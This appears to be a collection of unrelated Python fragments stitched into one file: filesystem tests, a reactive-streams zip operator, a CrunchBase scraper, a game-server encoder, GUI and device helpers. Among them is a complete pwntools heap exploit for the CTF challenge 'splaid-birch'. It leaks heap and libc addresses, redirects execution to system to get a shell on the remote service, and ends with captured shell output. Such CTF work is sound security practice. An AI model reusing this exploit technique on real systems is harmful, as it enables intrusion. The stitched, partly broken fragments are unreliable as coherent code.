except:
pass
with open(TEST_IMAGE_PATH, "wb") as f:
f.write(b"\x00" * TEST_IMAGE_SIZE)
try:
yield
finally:
try:
os.remove(TEST_IMAGE_PATH)
except:
pass
@contextlib.contextmanager
def test_fs():
with test_image():
set_first_partition_fat32(TEST_IMAGE_PATH, TEST_PART_SIZE)
with mbr.MBR(TEST_IMAGE_PATH) as m:
partition_offset = m.Partitions[0].RelativeSector * mbr.SECTOR_SIZE
create_fat32_filesystem(TEST_IMAGE_PATH, partition_offset, TEST_PART_SIZE)
fs = fat32.FAT32(False)
with open(TEST_IMAGE_PATH, "r+b") as f:
fs.vsLoad(f, partition_offset, writeback=True)
yield fs
@contextlib.contextmanager
def test_logical_fs():
with test_fs() as fs:
yield fat32.FAT32LogicalFileSystem(fs)
class TestPyFAT(unittest.TestCase):
def test_make_partition(self):
with test_image():
set_first_partition_fat32(TEST_IMAGE_PATH, TEST_PART_SIZE)
with mbr.MBR(TEST_IMAGE_PATH) as m:
self.assertEqual(m.Partitions[0].SystemID, mbr.SYSTEMID.PRI_FAT32_INT13)
self.assertEqual(m.Partitions[0].RelativeSector, 2048)
self.assertEqual(m.Partitions[0].TotalSectors, TEST_PART_SIZE // mbr.SECTOR_SIZE)
def test_make_filesystem(self):
with test_image():
set_first_partition_fat32(TEST_IMAGE_PATH, TEST_PART_SIZE)
with test_fs() as fs:
self.assertEqual(fs.bpb.BPB_NumFATs, 2)
self.assertEqual(fs.bpb_backup.BPB_NumFATs, 2)
def test_cluster_access(self):
with test_fs() as fs:
# test directly set cluster content
self.assertEqual(len(fs.clusters[3]), fs.getClusterSize())
self.assertEqual(bytes(fs.clusters[3]), b"\x00" * fs.getClusterSize())
fs.clusters[3] = b"\x69" * fs.getClusterSize()
self.assertEqual(bytes(fs.clusters[3]), b"\x69" * fs.getClusterSize())
# although the data is set, the cluster is still free
# FAT table: [0] reserved, [1] reserved, [2] root, [3] free, [4] free
self.assertEqual(fs.isClusterFree(3), True)
# since nothing's been allocated, clusters 0 and 1 are reserved, root entry is 2,
# so the first free cluster is 3
self.assertEqual(fs.getFreeClusterNumber(), 3)
# FAT table: [0] reserved, [1] reserved, [2] root, [3] LAST, [4] free
fs.markClusterUsed(3)
self.assertEqual(fs.isClusterFree(3), False)
self.assertEqual(fs.getFreeClusterNumber(), 4)
self.assertEqual(fs.getClusterChain(3), [3, fat32.CLUSTER_TYPES.LAST])
# FAT table: [0] reserved, [1] reserved, [2] root, [3] free, [4] free
fs.markClusterFree(3)
self.assertEqual(fs.isClusterFree(3), True)
# FAT table: [0] reserved, [1] reserved, [2] root, [3] 4, [4] LAST
fs.markClusterUsed(4)
fs.markClusterUsed(3, 4)
self.assertEqual(fs.getClusterChain(3), [3, 4, fat32.CLUSTER_TYPES.LAST])
fs.markClusterFree(3)
fs.markClusterFree(4)
# test small run
with self.assertRaises(fat32.FileDoesNotExistException):
fs.getContent(3)
p = fs.addContent(b"hello world!")
self.assertEqual(fs.getContent(p).rstrip(b"\x00"), b"hello world!")
fs.delContent(p)
with self.assertRaises(fat32.FileDoesNotExistException):
fs.getContent(p)
# test empty run
with self.assertRaises(fat32.FileDoesNotExistException):
fs.getContent(3)
p = fs.addContent(b"")
self.assertEqual(fs.getContent(p).rstrip(b"\x00"), b"")
fs.delContent(p)
with self.assertRaises(fat32.FileDoesNotExistException):
fs.getContent(p)
# test writing and overwriting data runs with smaller, equal, and bigger data
cases = [
{"cluster_count_one": 0, "cluster_count_two": 0},
{"cluster_count_one": 0, "cluster_count_two": 1},
{"cluster_count_one": 0, "cluster_count_two": 2},
{"cluster_count_one": 1, "cluster_count_two": 0},
{"cluster_count_one": 1, "cluster_count_two": 1},
{"cluster_count_one": 1, "cluster_count_two": 2},
{"cluster_count_one": 2, "cluster_count_two": 0},
{"cluster_count_one": 2, "cluster_count_two": 1},
{"cluster_count_one": 2, "cluster_count_two": 2}
]
for case in cases:
v1 = b"A" * fs.getClusterSize() * case["cluster_count_one"]
v2 = b"B" * fs.getClusterSize() * case["cluster_count_two"]
p = fs.addContent(v1)
self.assertEqual(fs.getContent(p).rstrip(b"\x00"), v1)
fs.setContent(p, v2)
self.assertEqual(fs.getContent(p).rstrip(b"\x00"), v2)
fs.delContent(p)
def test_directories83(self):
with test_logical_fs() as fs:
self.assertEqual(list(fs.listFiles()), [])
self.assertEqual(list(fs.listDirectories()), [])
with self.assertRaises(fat32.FileDoesNotExistException):
fs.readFile("/DNE.TXT")
with self.assertRaises(fat32.FileDoesNotExistException):
fs.delDirectory("/TEST")
fs.addDirectory("/TEST")
self.assertEqual(list(fs.listDirectories()), ["/TEST"])
with self.assertRaises(fat32.FileExistsException):
fs.addDirectory("/TEST")
fs.delDirectory("/TEST")
self.assertEqual(list(fs.listDirectories()), [])
def test_files83(self):
with test_logical_fs() as fs:
self.assertEqual(list(fs.listFiles()), [])
self.assertEqual(list(fs.listDirectories()), [])
with self.assertRaises(fat32.FileDoesNotExistException):
fs.readFile("/DNE.TXT")
with self.assertRaises(fat32.FileDoesNotExistException):
fs.delFile("/TEST.TXT")
fs.addFile("/TEST.TXT", b"AA")
self.assertEqual(list(fs.listFiles()), ["/TEST.TXT"])
self.assertEqual(fs.readFile("/TEST.TXT"), b"AA")
with self.assertRaises(fat32.FileExistsException):
fs.addFile("/TEST.TXT", b"BB")
fs.delFile("/TEST.TXT")
self.assertEqual(list(fs.listFiles()), [])
# can't simply list directories, since we support long names
# so need to access the files by short name directly
fs.addFile("/TEST-LONG.TXT", b"AA")
self.assertEqual(fs.readFile("/TEST-L~0.TXT"), b"AA")
fs.addFile("/TEST-LONG1.TXT", b"BB")
self.assertEqual(fs.readFile("/TEST-L~1.TXT"), b"BB")
def test_directories(self):
with test_logical_fs() as fs:
self.assertEqual(list(fs.listFiles()), [])
self.assertEqual(list(fs.listDirectories()), [])
with self.assertRaises(fat32.FileDoesNotExistException):
fs.readFile("/dne.txt")
with self.assertRaises(fat32.FileDoesNotExistException):
fs.delDirectory("/test-longlong")
# this value extracted from an entry created by the Windows FAT32 driver
self.assertEqual(fat32.DIRECTORY_DATA.compute83Hash("TEST-L~1 "), 0x7)
fs.addDirectory("/test-longlonglonglong")
self.assertEqual(list(fs.listDirectories()), ["/test-longlonglonglong"])
with self.assertRaises(fat32.FileExistsException):
fs.addDirectory("/test-longlonglonglong")
fs.addDirectory("/test-longlonglonglong/hahahahahahahahahaha")
self.assertEqual(list(fs.listDirectories()), ["/test-longlonglonglong", "/test-longlonglonglong/hahahahahahahahahaha"])
with self.assertRaises(fat32.DirectoryNotEmptyException):
fs.delDirectory("/test-longlonglonglong")
fs.delDirectory("/test-longlonglonglong/hahahahahahahahahaha")
self.assertEqual(list(fs.listDirectories()), ["/test-longlonglonglong"])
fs.delDirectory("/test-longlonglonglong")
self.assertEqual(list(fs.listDirectories()), [])
def test_files(self):
with test_logical_fs() as fs:
self.assertEqual(list(fs.listFiles()), [])
self.assertEqual(list(fs.listDirectories()), [])
with self.assertRaises(fat32.FileDoesNotExistException):
fs.readFile("/dne.txt")
with self.assertRaises(fat32.FileDoesNotExistException):
fs.delFile("/test-longlong.txt")
fs.addFile("/test-longlong.txt", b"AA")
self.assertEqual(list(fs.listFiles()), ["/test-longlong.txt"])
self.assertEqual(fs.readFile("/test-longlong.txt"), b"AA")
with self.assertRaises(fat32.FileExistsException):
fs.addFile("/test-longlong.txt", b"AA")
fs.delFile("/test-longlong.txt")
self.assertEqual(list(fs.listFiles()), [])
fs.addDirectory("/test-longlonglonglong")
self.assertEqual(list(fs.listDirectories()), ["/test-longlonglonglong"])
fs.addFile("/test-longlonglonglong/test-longlong.txt", b"AA")
self.assertEqual(list(fs.listFiles()), ["/test-longlonglonglong/test-longlong.txt"])
self.assertEqual(fs.readFile("/test-longlonglonglong/test-longlong.txt"), b"AA")
with self.assertRaises(fat32.DirectoryNotEmptyException):
fs.delDirectory("/test-longlonglonglong")
self.assertEqual(list(fs.listFiles()), ["/test-longlonglonglong/test-longlong.txt"])
fs.delFile("/test-longlonglonglong/test-longlong.txt")
self.assertEqual(list(fs.listFiles()), [])
fs.delDirectory("/test-longlonglonglong")
def test():
import sys
if "-v" in sys.argv or "--verbose" in sys.argv:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
try:
unittest.main()
except SystemExit:
pass
if __name__ == '__main__':
test()
|
116605
|
def armsinside():
i01.rightArm.rotate.attach()
i01.rightArm.rotate.moveTo(0)
sleep(7)
i01.rightArm.rotate.detach()
|
116614
|
from . import SimConcretizationStrategy
class SimConcretizationStrategyRange(SimConcretizationStrategy):
"""
Concretization strategy that resolves addresses to a range.
"""
def __init__(self, limit, **kwargs): #pylint:disable=redefined-builtin
super(SimConcretizationStrategyRange, self).__init__(**kwargs)
self._limit = limit
def _concretize(self, memory, addr):
mn,mx = self._range(memory, addr)
if mx - mn <= self._limit:
return self._eval(memory, addr, self._limit)
|
116642
|
from Classes.Logic.LogicLong import LogicLong
from Classes.Wrappers.PlayerDisplayData import PlayerDisplayData
class PlayerProfile:
def encode(calling_instance, fields, playerData):
calling_instance.encodeLogicLong(LogicLong(fields["PlayerID"][0], fields["PlayerID"][1]))
calling_instance.writeDataReference(0)
sortedBrawlers = sorted(playerData["OwnedBrawlers"], key=lambda x: (playerData["OwnedBrawlers"][x]['Trophies']), reverse=True)
calling_instance.writeVInt(len(sortedBrawlers))
for brawlerID in sortedBrawlers:
brawlerData = playerData["OwnedBrawlers"][brawlerID]
calling_instance.writeDataReference(16, brawlerID)
if brawlerData["Skins"] != []:
calling_instance.writeDataReference(29, brawlerData["Skins"][0]) # TODO: Sync with current skin
else:
calling_instance.writeDataReference(0)
calling_instance.writeVInt(brawlerData["Trophies"])
calling_instance.writeVInt(brawlerData["HighestTrophies"])
calling_instance.writeVInt(brawlerData["PowerLevel"])
calling_instance.writeVInt(16)
calling_instance.writeVInt(1)
calling_instance.writeVInt(9999)
calling_instance.writeVInt(2)
calling_instance.writeVInt(playerData["Experience"])
calling_instance.writeVInt(3)
calling_instance.writeVInt(playerData["Trophies"])
calling_instance.writeVInt(4)
calling_instance.writeVInt(playerData["HighestTrophies"])
calling_instance.writeVInt(5)
calling_instance.writeVInt(len(sortedBrawlers))
calling_instance.writeVInt(8)
calling_instance.writeVInt(9999)
calling_instance.writeVInt(11)
calling_instance.writeVInt(9999)
calling_instance.writeVInt(9)
calling_instance.writeVInt(0)
calling_instance.writeVInt(12)
calling_instance.writeVInt(0)
calling_instance.writeVInt(13)
calling_instance.writeVInt(100)
calling_instance.writeVInt(14)
calling_instance.writeVInt(0)
calling_instance.writeVInt(15)
calling_instance.writeVInt(9999)
calling_instance.writeVInt(16)
calling_instance.writeVInt(0)
calling_instance.writeVInt(18)
calling_instance.writeVInt(0)
calling_instance.writeVInt(17)
calling_instance.writeVInt(0)
calling_instance.writeVInt(19)
calling_instance.writeVInt(0)
PlayerDisplayData.encode(calling_instance, playerData)
def decode(calling_instance, fields):
pass
|
116660
|
from etherscan.blocks import Blocks
import json
with open('../../api_key.json', mode='r') as key_file:
key = json.loads(key_file.read())['key']
api = Blocks(api_key=key)
reward = api.get_block_reward(2165403)
print(reward)
|
116675
|
import itertools
import threading
from traceback import FrameSummary
from typing import Callable, Any, Optional, List
from rx.disposable import CompositeDisposable
from rxbp.acknowledgement.acksubject import AckSubject
from rxbp.acknowledgement.ack import Ack
from rxbp.acknowledgement.continueack import continue_ack
from rxbp.acknowledgement.stopack import stop_ack, StopAck
from rxbp.observable import Observable
from rxbp.observer import Observer
from rxbp.observerinfo import ObserverInfo
from rxbp.states.measuredstates.terminationstates import TerminationStates
from rxbp.states.measuredstates.zipstates import ZipStates
from rxbp.states.rawstates.rawterminationstates import RawTerminationStates
from rxbp.states.rawstates.rawzipstates import RawZipStates
from rxbp.typing import ElementType
from rxbp.utils.tooperatorexception import to_operator_exception
class ZipObservable(Observable):
"""
An observable that zips the elements of a left and right observable.
The following illustrates the function call stack of the following subscription:
disposable = s1.zip(s2).subscribe(o, scheduler=s)
^ callstack zip zip
| / /
| o s1 o s1
| / / ack1 / / ack1
| zip zip -- zip --
| / / /
| s1 s2----------- ----------- ...
| / /
| s s time
--------------------------------------------->
s: scheduler
s1: source 1 (left observable)
s2: source 2 (right observable)
zip: zip operator
o: output observer
ack1: asynchronous acknowledgment returned by zip.on_next called by s1
"""
def __init__(
self,
left: Observable,
right: Observable,
stack: List[FrameSummary],
):
"""
:param left: left observable
:param right: right observable
:param selector: a result selector function that maps each zipped element to some result
"""
super().__init__()
self.left = left
self.right = right
self.stack = stack
self.lock = threading.RLock()
# Zip2Observable states
self.observer: Optional[Observer] = None
self.termination_state = RawTerminationStates.InitState()
self.state: RawZipStates.ZipState = RawZipStates.WaitOnLeftRight()
def _iterate_over_batch(self, elem: ElementType, is_left: bool):
"""
this function is called on `on_next` call from left or right observable
"""
# if elem is a list, make an iterator out of it
iterable = iter(elem)
# in case the zip process is started and the output observer returns a synchronous acknowledgment,
# then `upstream_ack` is not actually needed; nevertheless, it is created here, because it makes
# the code simpler
upstream_ack = AckSubject()
# prepare next raw state
next_state = RawZipStates.ElementReceived(
is_left=is_left,
ack=upstream_ack,
iter=iterable,
)
# synchronous update the state
with self.lock:
next_state.prev_raw_state = self.state
next_state.prev_raw_termination_state = self.termination_state
self.state = next_state
meas_state = next_state.get_measured_state(next_state.prev_raw_termination_state)
# pattern match measured state
if isinstance(meas_state, ZipStates.Stopped):
return stop_ack
# wait on other observable
elif isinstance(meas_state, ZipStates.WaitOnRight) or isinstance(meas_state, ZipStates.WaitOnLeft):
return upstream_ack
# start zipping operation
elif isinstance(meas_state, ZipStates.ZipElements):
if is_left:
other_upstream_ack = meas_state.right_ack
else:
other_upstream_ack = meas_state.left_ack
else:
raise Exception(f'unknown state "{meas_state}", is_left {is_left}')
# in case left and right batch don't match in number of elements,
# n1 will not be None after zipping
n1 = [None]
def gen_zipped_elements():
""" generate a sequence of zipped elements """
while True:
n1[0] = None
try:
n1[0] = next(meas_state.left_iter)
n2 = next(meas_state.right_iter)
except StopIteration:
break
# yield self.selector(n1[0], n2)
yield (n1[0], n2)
try:
# zip left and right batch
zipped_elements = list(gen_zipped_elements())
except Exception as exc:
# self.observer.on_error(exc)
other_upstream_ack.on_next(stop_ack)
# return stop_ack
raise Exception(to_operator_exception(
message='',
stack=self.stack,
))
if 0 < len(zipped_elements):
downstream_ack = self.observer.on_next(zipped_elements)
else:
downstream_ack = continue_ack
if isinstance(downstream_ack, StopAck):
other_upstream_ack.on_next(stop_ack)
return stop_ack
# request new element from left source
if n1[0] is None:
new_left_iter = None
request_new_elem_from_left = True
# request new element also from right source?
try:
val = next(meas_state.right_iter)
new_right_iter = itertools.chain([val], meas_state.right_iter)
request_new_elem_from_right = False
# request new element from left and right source
except StopIteration:
new_right_iter = None
request_new_elem_from_right = True
# request new element only from right source
else:
new_left_iter = itertools.chain(n1, meas_state.left_iter)
new_right_iter = None
request_new_elem_from_left = False
request_new_elem_from_right = True
# define next state after zipping
# -------------------------------
# request new element from both sources
if request_new_elem_from_left and request_new_elem_from_right:
next_state = RawZipStates.WaitOnLeftRight()
# request new element only from right source
elif request_new_elem_from_right:
next_state = RawZipStates.WaitOnRight(
left_iter=new_left_iter,
left_ack=meas_state.left_ack,
)
# request new element only from left source
elif request_new_elem_from_left:
next_state = RawZipStates.WaitOnLeft(
right_iter=new_right_iter,
right_ack=meas_state.right_ack,
)
else:
raise Exception('after the zip operation, a new element needs '
'to be requested from at least one source')
with self.lock:
# get termination state
raw_prev_termination_state = self.termination_state
# set next state
self.state = next_state
meas_state = next_state.get_measured_state(raw_prev_termination_state)
# stop zip observable
# previous state cannot be "Stopped", therefore don't check previous state
if isinstance(meas_state, ZipStates.Stopped):
prev_termination_state = raw_prev_termination_state.get_measured_state()
if isinstance(prev_termination_state, TerminationStates.ErrorState):
self.observer.on_error(prev_termination_state.ex)
other_upstream_ack.on_next(stop_ack)
return stop_ack
else:
self.observer.on_completed()
other_upstream_ack.on_next(stop_ack)
return stop_ack
# request new elements
else:
if request_new_elem_from_left and request_new_elem_from_right:
downstream_ack.subscribe(other_upstream_ack)
return downstream_ack
elif request_new_elem_from_right:
if is_left:
downstream_ack.subscribe(other_upstream_ack)
else:
return downstream_ack
elif request_new_elem_from_left:
if is_left:
return downstream_ack
else:
downstream_ack.subscribe(other_upstream_ack)
else:
raise Exception('at least one side should be back-pressured')
return upstream_ack
def _on_next_left(self, elem: ElementType):
return_ack = self._iterate_over_batch(elem=elem, is_left=True)
return return_ack
def _on_next_right(self, elem: ElementType):
return_ack = self._iterate_over_batch(elem=elem, is_left=False)
return return_ack
def _signal_on_complete_or_on_error(
self,
state: ZipStates.ZipState,
exc: Exception = None,
):
"""
this function is called once
"""
# stop active acknowledgments
if isinstance(state, ZipStates.WaitOnLeftRight):
pass
elif isinstance(state, ZipStates.WaitOnLeft):
state.right_ack.on_next(stop_ack)
elif isinstance(state, ZipStates.WaitOnRight):
state.left_ack.on_next(stop_ack)
else:
pass
# terminate observer
if exc:
self.observer.on_error(exc)
else:
self.observer.on_completed()
def _on_error_or_complete(
self,
next_final_state: RawTerminationStates.TerminationState,
exc: Exception = None,
):
with self.lock:
raw_prev_final_state = self.termination_state
raw_prev_state = self.state
next_final_state.raw_prev_state = raw_prev_final_state
self.termination_state = next_final_state
prev_state = raw_prev_state.get_measured_state(raw_prev_final_state)
curr_state = raw_prev_state.get_measured_state(next_final_state)
if not isinstance(prev_state, ZipStates.Stopped) \
and isinstance(curr_state, ZipStates.Stopped):
self._signal_on_complete_or_on_error(prev_state, exc=exc)
def _on_error(self, exc: Exception):
# next_final_state = RawTerminationStates.ErrorState(exc=exc)
#
# self._on_error_or_complete(next_final_state=next_final_state, exc=exc)
self.observer.on_error(exc)
def _on_completed_left(self):
next_final_state = RawTerminationStates.LeftCompletedState()
self._on_error_or_complete(next_final_state=next_final_state)
def _on_completed_right(self):
next_final_state = RawTerminationStates.RightCompletedState()
self._on_error_or_complete(next_final_state=next_final_state)
def observe(self, observer_info: ObserverInfo):
self.observer = observer_info.observer
class ZipLeftObserver(Observer):
def on_next(_, elem: ElementType) -> Ack:
return self._on_next_left(elem)
def on_error(_, exc: Exception):
self._on_error(exc)
def on_completed(_):
self._on_completed_left()
class ZipRightObserver(Observer):
def on_next(_, elem: ElementType) -> Ack:
return self._on_next_right(elem)
def on_error(_, exc: Exception):
self._on_error(exc)
def on_completed(_):
self._on_completed_right()
left_observer = ZipLeftObserver()
left_subscription = observer_info.copy(
observer=left_observer,
)
d1 = self.left.observe(left_subscription)
right_observer = ZipRightObserver()
right_subscription = observer_info.copy(
observer=right_observer,
)
d2 = self.right.observe(right_subscription)
return CompositeDisposable(d1, d2)
|
116687
|
import os
import threading
import Menu_Page_Router
from GPIO_Init import checkKeyInterrupt
from OP_1_Connection import autoMountUnmontThread
from file_util import createImportantFolders
__author__ = "<NAME> (<NAME>)"
__date__ = "2019-04-02"
workDir = os.path.dirname(os.path.realpath(__file__))
def start():
# create important missing folders
createImportantFolders()
threading.Thread(target=autoMountUnmontThread).start()
currentCursor = 1
# Initialize Menu System
pg = Menu_Page_Router.PageRouter()
# Start First Page
pg.renderPage(0, currentCursor)
while 1:
key = checkKeyInterrupt()
if key == "UP":
if currentCursor - 1 >= 1:
currentCursor -= 1
pg.renderPage(0, currentCursor)
elif key == "DOWN":
if currentCursor + 1 < pg.getListSize():
currentCursor += 1
pg.renderPage(0, currentCursor)
elif key == "LEFT":
# currentCursor = 1
currentCursor = pg.renderPage(-1, 1)
pg.renderPage(0, currentCursor)
elif key == "RIGHT":
pg.renderPage(1, currentCursor)
currentCursor = 1
elif key == "CENTER":
pg.renderPage(1, currentCursor)
currentCursor = 1
elif key == "B":
pg.renderPage(1, currentCursor)
currentCursor = 1
pass
elif key == "A":
currentCursor = pg.renderPage(-1, 1)
pg.renderPage(0, currentCursor)
pass
if __name__ == "__main__":
start()
|
116743
|
from ..abstract_manifest import AbstractManifest
from bitmovin.resources.enums.hls_version import HlsVersion
class HlsManifest(AbstractManifest):
def __init__(self, manifest_name, outputs, name=None, description=None, id_=None, custom_data=None,
hls_media_playlist_version=None, hls_master_playlist_version=None):
super().__init__(id_=id_, custom_data=custom_data, manifest_name=manifest_name, outputs=outputs,
name=name, description=description)
self._hlsMediaPlaylistVersion = None
self.hlsMediaPlaylistVersion = hls_media_playlist_version
self._hlsMasterPlaylistVersion = None
self.hlsMasterPlaylistVersion = hls_master_playlist_version
@property
def hlsMediaPlaylistVersion(self):
return self._hlsMediaPlaylistVersion
@hlsMediaPlaylistVersion.setter
def hlsMediaPlaylistVersion(self, new_hls_media_playlist_version):
if new_hls_media_playlist_version is None:
self._hlsMediaPlaylistVersion = None
elif isinstance(new_hls_media_playlist_version, HlsVersion):
self._hlsMediaPlaylistVersion = new_hls_media_playlist_version.value
elif isinstance(new_hls_media_playlist_version, int):
self._hlsMediaPlaylistVersion = new_hls_media_playlist_version
else:
raise InvalidTypeError('hlsMediaPlaylistVersion has to be of type HlsVersion')
@property
def hlsMasterPlaylistVersion(self):
return self._hlsMasterPlaylistVersion
@hlsMasterPlaylistVersion.setter
def hlsMasterPlaylistVersion(self, new_hls_master_playlist_version):
if new_hls_master_playlist_version is None:
self._hlsMasterPlaylistVersion = None
elif isinstance(new_hls_master_playlist_version, HlsVersion):
self._hlsMasterPlaylistVersion = new_hls_master_playlist_version.value
elif isinstance(new_hls_master_playlist_version, int):
self._hlsMasterPlaylistVersion = new_hls_master_playlist_version
else:
raise InvalidTypeError('hlsMasterPlaylistVersion has to be of type HlsVersion')
@classmethod
def parse_from_json_object(cls, json_object):
manifest = AbstractManifest.parse_from_json_object(json_object=json_object)
id_ = manifest.id
manifest_name = manifest.manifestName
name = manifest.name
description = manifest.description
custom_data = manifest.customData
outputs = manifest.outputs
hls_media_playlist_version = json_object.get('hlsMediaPlaylistVersion')
hls_master_playlist_version = json_object.get('hlsMasterPlaylistVersion')
hls_manifest = HlsManifest(id_=id_, manifest_name=manifest_name, custom_data=custom_data,
outputs=outputs, name=name, description=description,
hls_media_playlist_version=hls_media_playlist_version,
hls_master_playlist_version=hls_master_playlist_version)
return hls_manifest
def serialize(self):
serialized = super().serialize()
serialized['hlsMediaPlaylistVersion'] = self.hlsMediaPlaylistVersion
serialized['hlsMasterPlaylistVersion'] = self.hlsMasterPlaylistVersion
return serialized
|
116783
|
import csv
import urllib2
import json
###########################################################################
## This searches crunchbase for "Stanford" and only returns people
###########################################################################
search = "http://api.crunchbase.com/v/1/search.js?query=stanford&entity=person&api_key=XXXX" ##Replace XXXX with CrunchBase API key
people_info = []
for i in range(300):
page = i
url = search + str(page)
print(i)
req = urllib2.Request(url)
j = urllib2.urlopen(req)
js = json.load(j)
people = len(js['results'])
for p in range(people):
permalink = js['results'][p]['permalink']
person_info = (permalink,'stanford')
print(person_info)
people_info.append(person_info)
write_to_csv('stanford_people.csv',people_info)
###########################################################################
## This takes the people from above, and looks each up. It returns a
## dimension_relationships table and a dimension_degrees table
###########################################################################
dim_degrees = []
dim_relationships = []
errors = []
count = 0
people = read_table('stanford_people.csv',True)
for p in people:
permalink = p[0]
url = "http://api.crunchbase.com/v/1/person/" + permalink + ".js?api_key=XXXX" ##Replace XXXX with CrunchBase API key
print(p[0])
print(count)
count += 1
try:
req = urllib2.Request(url)
j = urllib2.urlopen(req)
js = json.load(j)
first_name = js['first_name']
last_name = js['last_name']
degrees = js['degrees']
relationships = js['relationships']
for d in degrees:
degree_type = d['degree_type']
subject = d['subject']
institution = d['institution']
graduated_year = d['graduated_year']
deg = (permalink,first_name,last_name,degree_type,subject,institution,graduated_year)
dim_degrees.append(deg)
for r in relationships:
is_past = r['is_past']
title = r['title']
firm_name = r['firm']['name']
firm_permalink = r['firm']['permalink']
rel = (permalink,first_name,last_name,is_past,title,firm_name,firm_permalink)
dim_relationships.append(rel)
except urllib2.HTTPError as e:
print('is error!')
errors.append((permalink,count))
write_to_csv('stanford_relationships.csv',dim_relationships)
write_to_csv('stanford_degrees.csv',dim_degrees)
write_to_csv('errors.csv',errors)
###########################################################################
## Some results retun special characters, this function strips those out
###########################################################################
def strip_special(array,columns_with_string):
new_table = []
for i in array:
new_row =[]
for j in range(len(i)):
if j in columns_with_string:
x = i[j].encode('utf-8').strip()
else:
x = i[j]
new_row.append(x)
new_table.append(new_row)
return new_table
###########################################################################
## Functions to write array to CSV, and read from CSV
###########################################################################
def write_to_csv(csv_name,array):
columns = len(array[0])
rows = len(array)
with open(csv_name, "wb") as test_file:
file_writer = csv.writer(test_file)
for i in range(rows):
print(i)
file_writer.writerow([array[i][j] for j in range(columns)])
def read_table(csv_name,include_header):
table = []
with open(csv_name, 'Ub') as csvfile:
f = csv.reader(csvfile, delimiter=',')
firstline = True
for row in f:
if firstline == False or include_header == True:
table.append(tuple(row))
firstline = False
return table
|
116792
|
from pwn import *
context.arch="amd64"
elf = ELF("./splaid-birch")
libc = ELF("./libc.so.6")
#p = process("./splaid-birch")
p = remote("splaid-birch.pwni.ng", 17579)
def sp_add(a, b):
p.sendline("5")
p.sendline(str(a))
p.sendline(str(b))
def delete(a):
p.sendline("1")
p.sendline(str(a))
for i in range(1, 3):
sp_add(i, 0x0)
sp_add(0, 0)
p.sendline("4")
p.sendline("531")
heap = int(p.recvline())
heap_base = heap - 0x12f8
for i in range(157):
sp_add(0x10+i, 0x0)
for i in range(0x10):
delete(0x10 + i)
sp_add(0x1234, heap + 0x1db8)
p.sendline("4")
p.sendline("-1817")
libc.address = int(p.recvline()) - 0x3ebca0
environ = libc.address + 0x3ee098
print "heap: " + hex(heap)
print "libc: " + hex(libc.address)
payload = "5\n"
payload += "5555\n"
payload += str(heap_base+0x4c0) + "\n"
payload += "4\n"
payload += "-1827\n"
payload += "5\n"
payload += str(0x6873) + "\n"
payload += "6666\n"
payload += "1\n"
payload += str(0x6873) + "\n"
payload = payload.ljust(0x200, "\x41")
fuck = libc.address + 0x3ed8e8 + 0x20
addr = p64(libc.address + 0x4f440) # system
payload += flat(0x0, 0x1234, 0x1234, 0x1234, 0, heap_base + 0x4c0 + 0x60, 0, 0, 0x4444, addr, 0, 0, fuck, fuck, 0x0, 0x10, 0x20)
payload = payload.ljust(0x500, "\x00")
p.sendline(payload)
p.interactive()
'''
$ id
uid=1012(splaid) gid=1013(splaid) groups=1013(splaid)
$ cd /home/splaid
$ ls
flag.txt
libsplaid.so.1
run.sh
splaid-birch
$ cat flag.txt
PCTF{7r335_0n_h34p5_0n_7r335_0n_5l3470r}
$
'''
|
116815
|
from taskloaf.cfg import Cfg
from taskloaf.zmq_cluster import zmq_run
from taskloaf.promise import task, when_all
from taskloaf.object_ref import alloc, put
from taskloaf.profile import Profiler
from taskloaf.timer import Timer
_ctx = None
def set_ctx(ctx):
global _ctx
_ctx = ctx
def ctx():
return _ctx
__all__ = [
"Cfg",
"zmq_run",
"task",
"when_all",
"alloc",
"put",
"Profiler",
"Timer",
]
|
116819
|
import cv2
import copy
import xxhash
import numpy as np
import imgui
import OpenGL.GL as gl
from .static_vars import *
from timeit import default_timer as timer
from . import imgui_ext
import math
from typing import *
from dataclasses import dataclass
_start = timer()
USE_FAST_HASH = True
LOG_GPU_USAGE = False
"""
Some type synonyms in order to make the code easier to understand
"""
TextureId = int # this is an openGl texture id
Image_RGB = np.ndarray # denotes a RGB image
Image_AnyType = np.ndarray # denotes any image contained in a np.ndarray
ImageAddress = int # this is the image memory address
def _is_close(a: float, b: float) -> bool:
return math.fabs(a - b) < 1E-6
# noinspection PyShadowingNames
class ImageAdjustments:
factor: float
delta: float
def __init__(self, factor: float = 1., delta: float = 0.):
self.factor = factor
self.delta = delta
def is_none(self):
return _is_close(self.factor, 1.) and _is_close(self.delta, 0.)
def adjust(self, image):
if self.is_none():
return image
else:
adjusted = ((image + self.delta) * self.factor).astype(image.dtype)
return adjusted
def __hash__(self):
return hash((self.factor, self.delta))
def __eq__(self, other):
return self.factor == other.factor and self.delta == other.delta
def _hash_image(image):
"""
Two hash variant are possible :
- if imgui_cv.USE_FAST_HASH is True : select 100 random pixels and hash them
- otherwise : compute the hash of the whole image (using xxhash for performance)
:param image:
:return:hash
"""
if USE_FAST_HASH:
rng = np.random.RandomState(89)
inds = rng.randint(low=0, high=image.size, size=100)
b = image.flat[inds]
result = hash(tuple(b.data))
return result
else:
# cf https://stackoverflow.com/questions/16589791/most-efficient-property-to-hash-for-numpy-array
h = xxhash.xxh64()
h.update(image)
result = h.intdigest()
h.reset()
return result
class ImageAndAdjustments:
image: Image_AnyType
image_adjustment: ImageAdjustments
def __init__(self, image, image_adjustments):
self.image = image
self.image_adjustments = image_adjustments
def adjusted_image(self):
return self.image_adjustments.adjust(self.image)
def __hash__(self):
hash_adjust = hash(self.image_adjustments)
hash_image = _hash_image(self.image)
result = hash((hash_adjust, hash_image))
return result
def __eq__(self, other):
"""
For performance reasons, the __eq__ operator is made to take only the hash into account.
@see _image_to_texture()
"""
hash1 = hash(self)
hash2 = hash(other)
return hash1 == hash2
class SizePixel:
width: int
height: int
def __init__(self, width=0, height=0):
self.width = int(width)
self.height = int(height)
@staticmethod
def from_image(image):
self = SizePixel()
self.width = image.shape[1]
self.height = image.shape[0]
return self
def as_tuple_width_height(self):
return self.width, self.height
# ALL_TEXTURES contains a dict of all the images that were transferred to the GPU
# plus their last access time
TimeSecond = float
NB_GEN_TEXTURES = 0
def _generate_texture_id() -> TextureId:
texture_id = gl.glGenTextures(1)
if LOG_GPU_USAGE:
global NB_GEN_TEXTURES
NB_GEN_TEXTURES = NB_GEN_TEXTURES + 1
print(f"NB_GEN_TEXTURES = {NB_GEN_TEXTURES}")
return texture_id
@dataclass
